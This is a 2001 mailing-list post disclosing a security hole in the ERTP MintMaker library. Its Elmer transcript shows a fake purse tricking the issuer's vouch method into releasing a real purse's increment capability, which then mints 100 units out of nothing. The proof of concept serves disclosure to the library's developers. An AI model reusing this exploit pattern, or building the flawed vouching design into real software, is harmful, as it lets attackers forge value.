[E-Lang] ERTP MintMaker Security Hole
steve jenson
stevej@sieve.net
Tue, 13 Feb 2001 17:12:23 -0800
As a result of issues raised by Hal Finney, MarkM discovered a rather
nasty security hole in previously posted ERTP-MintMaker source earlier.
I'll post the results of an Elmer Transcript and let MarkM explain further
the whole issue:
? def mint := MintMaker("ForkNox")
# value: <ForkNox's mint>
? def issuer := mint.issuer
# value: <ForkNox's issuer>
? def purse := issuer makePurse
# value: Purse Quantity: 0
? def sealedIncr := purse.incr
# value: <sealed by ForkNox>
? def fakePurse {
> to getSealed :any { sealedIncr }
> }
# value: <fakePurse>
? def snabbedIncr := issuer vouch(fakePurse)
# value: <Incr>
? purse
# value: Purse Quantity: 0
? snabbedIncr(100)
? purse
# value: Purse Quantity: 100
cheers,
steve